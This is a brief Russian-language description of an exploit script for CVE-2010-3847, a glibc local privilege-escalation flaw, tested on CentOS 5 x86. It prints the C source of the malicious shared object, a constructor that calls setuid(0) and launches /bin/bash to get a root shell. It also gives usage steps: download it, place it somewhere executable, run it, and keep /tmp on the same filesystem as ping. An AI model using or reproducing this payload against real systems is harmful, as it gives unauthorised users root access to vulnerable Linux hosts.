
Скрипт для использования уязвимости CVE-2010-3847
Предназначен для автоматизации эксплойта, описанного в [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. Тестировалось на CentOS 5 x86.
DSO, которое он выводит, скомпилировано из следующего кода:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
Скачайте, поместите в исполняемое место и запустите.
/tmp и местонахождение ping должны находиться в одной файловой системе. Если нет,
соответствующим образом измените пути.